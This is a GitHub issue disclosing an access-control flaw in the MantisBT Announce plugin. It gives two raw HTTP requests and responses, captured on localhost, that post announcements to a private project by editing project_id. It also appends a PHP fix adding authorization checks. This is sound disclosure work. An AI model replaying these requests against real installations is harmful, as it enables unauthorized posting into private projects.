mantisbt-plugins / Announce

Announcements plugin for MantisBT, lets privileged accounts create and post announcements that can be shown to users on a global or per-project basis, and allow users to dismiss individual messages.
MIT License

Non-authenticated member can post news to a private project #55

Open jrckmcsb opened 3 years ago

jrckmcsb commented 3 years ago

When the admin enables the news section, some new things appear, like the main field that will be used for announcements/news. Some users can have access to it (manager). However, it seems that a lot of security issues are introduced here..

Description

This allows an attacker to post an announcement on a private project even if they are not part of it.

Steps to reproduce

Request

POST /mantisbt-2.24.3/plugin.php?page=Announce/create HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 209
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt-2.24.3/plugin.php?page=Announce/list
Cookie: MANTIS_collapse_settings=|sidebar:0; MANTIS_VIEW_ALL_COOKIE=1; MANTIS_PROJECT_COOKIE=1; PHPSESSID=7usorjepb776qjidi5qsg8elb8; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=c16e1a2abfe29f2ae0cd4722fa1d69c8883f2fb7ed79ca412b5b72293cb1e84b; MANTIS_MANAGE_USERS_COOKIE=0%3Ausername%3AASC%3A0; MANTIS_BUG_LIST_COOKIE=9
Upgrade-Insecure-Requests: 1

plugin_Announce_create_token=20201002ulRDzusShT_qtfzjQvzOJrSdwaEg2G05&title=AWESOME+NEWS+FOR+PRIVATE+PROJECT&message=AWESOME+NEWS+FOR+PRIVATE+PROJECT&location=header&project_id=1&access=10&ttl=0&dismissable=on

Response

HTTP/1.1 302 Found
Date: Fri, 02 Oct 2020 11:27:50 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Fri, 02 Oct 2020 11:27:51 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Fri, 02 Oct 2020 11:27:51 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Location: http://localhost/mantisbt-2.24.3/plugin.php?page=Announce/list
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8

Manager as attacker

Request

POST /mantisbt-2.24.3/plugin.php?page=Announce/create HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 233
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt-2.24.3/plugin.php?page=Announce/list
Cookie: MANTIS_collapse_settings=|monitored:1; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=2; PHPSESSID=24tihn6miqrj33tjrdleo94ef4; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=v7kQ0OCxCPCnyNcBXEGWqV5Oj4UaowOhahhT0UBedcplivtLAgZS-zGkJQOFiIMj; MANTIS_BUG_LIST_COOKIE=5%2C1%2C4
Upgrade-Insecure-Requests: 1

plugin_Announce_create_token=20201002mANdg2UBhW7V-buExLRrPmNcxZ3HrCN2&title=This+is+some+announcement+for+public+project&message=This+is+some+announcement+for+public+project&location=header&project_id=0&access=10&ttl=0&dismissable=on

Response

HTTP/1.1 302 Found
Date: Fri, 02 Oct 2020 11:35:36 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Fri, 02 Oct 2020 11:35:36 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Fri, 02 Oct 2020 11:35:36 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Location: http://localhost/mantisbt-2.24.3/plugin.php?page=Announce/list
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8

Some notes

These are the things that I observed, but I am not sure if this is just part of the configuration feature (this can be prevented if the admin just sets the configuration to admin..)

Delete news for private project

View the private project name

All of these can be done after going to plugin.php?page=Announce/list. I am just adding this information.... I believe these issues should be considered for fixing/updating.
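The two captured requests differ only in the caller-supplied `project_id` (1 for the private project, 0 for all projects), so the fix on the server side is an explicit, project-scoped authorization check before anything is written. The following is an added example of such a check for the create handler; it is not the Announce plugin's own code. It assumes the MantisBT core API functions named in the comments and a plugin config key `manage_threshold`, which is an assumed name and must be replaced with the plugin's real threshold setting.

```php
<?php
// Added example (not the Announce plugin's code): project-scoped
// authorization for the "create" handler. Assumed MantisBT core API:
// form_security_validate, gpc_get_int, auth_get_current_user_id,
// plugin_config_get, project_exists, project_get_field,
// project_includes_user, access_has_project_level, access_denied,
// and the constants ALL_PROJECTS and VS_PRIVATE.
// 'manage_threshold' is an assumed config key.

form_security_validate( 'plugin_Announce_create' );

$t_user_id    = auth_get_current_user_id();
$t_project_id = gpc_get_int( 'project_id', ALL_PROJECTS );
$t_threshold  = plugin_config_get( 'manage_threshold' ); // assumed key

if( ALL_PROJECTS == $t_project_id ) {
	// A global announcement is shown in every project, so require the
	// threshold at the ALL_PROJECTS level, not merely in one project.
	if( !access_has_project_level( $t_threshold, ALL_PROJECTS, $t_user_id ) ) {
		access_denied();
	}
} else {
	// Per-project announcement: never trust the submitted id on its own.
	if( !project_exists( $t_project_id ) ) {
		access_denied();
	}
	// For a private project the user must actually be a member; this is
	// the check that a hand-edited project_id=1 would otherwise bypass.
	if( VS_PRIVATE == project_get_field( $t_project_id, 'view_state' )
		&& !project_includes_user( $t_project_id, $t_user_id ) ) {
		access_denied();
	}
	// And the user must hold the manage threshold in that project.
	if( !access_has_project_level( $t_threshold, $t_project_id, $t_user_id ) ) {
		access_denied();
	}
}

// Only after every check above passes should the announcement be created.
```

The same checks apply to the delete and list paths the report mentions, since a user who cannot view a private project should not see its name or remove its announcements either.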